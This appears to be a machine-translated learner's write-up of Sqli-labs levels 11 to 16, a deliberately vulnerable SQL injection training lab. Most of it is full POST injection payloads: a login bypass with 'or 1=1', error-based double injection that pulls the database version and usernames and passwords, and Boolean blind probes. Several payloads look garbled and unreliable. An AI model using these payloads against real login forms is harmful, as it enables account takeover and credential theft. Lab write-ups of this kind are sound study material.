"Sqli-labs" Less11~less16

Learn Sqli-labs notes, the notes in front of the content more detailed. The following only records the key points.

Less11:post injection, there is echo, there are error hints

From 11 onwards it was post injection and found two input boxes. Use Firefox's F12 to view the submission parameters as

uname=1&passwd=1&submit=submit

and uname on the test.

uname='&passwd=1&submit=submit

Error: You have aerror in your SQL syntax; check the manual, corresponds to your MySQL server version for the RI Ght syntax to use near "and password=" LIMIT 0,1 ' at line 1

Description statement format for where a= ' abc ' format

Finally, the login is bypassed by a perpetual statement:

uname='  or 1=1 limit 1,1--a&passwd=&submit=submit

LESS12:

Almost the same as the 11 question, that is, the closed way becomes ("xxx")

uname=") or 1=1 limit--A&passwd=&submit=submit

Less13:post injection, no echo, error

With LESS5 double injection, pay attention to the closure can

uname=') union (SELECT COUNT (*), concat (@ @version, floor (rand (0) ~)) A from Information_ Schema.tables GROUP by a)--A&passwd=&submit=submit

Get User name password

uname=') union (SELECT COUNT (*), concat ((select Concat (username,'/' ) , password) from the users limit 0,1), floor (rand (0) *)) A from Information_schema.tables group by a)--a&passwd=&s Ubmit=submit

LESS14:

Almost the same as the 13 question, only the closed way becomes "a"

uname="  Union (SELECT COUNT (*), concat ((select concat (username, '/', password) from users limit 0,1 ), Floor (rand (0) *)) A from Information_schema.tables group by a)--A&passwd=&submit=submit

Less15:post Injection, Boolean blind

Depending on the success of the login and the failure of the login, the results are different, and the blind test can be continued. Like the following statement, you need to try one character at a character.

uname='  or length (@ @version) >10--A&passwd=&submit=submit

uname='  or ASCII (substr (@ @version, +)) >64--A&passwd=&submit=submit

I'm really tired of trying.

LESS16:

The same as the root 15, is the closure of the way changed (PS: The name is called the time blind, but feel completely useless AH)

uname=") or ASCII (substr (@ @version, +)) >0--A&passwd=&submit=submit

"Sqli-labs" Less11~less16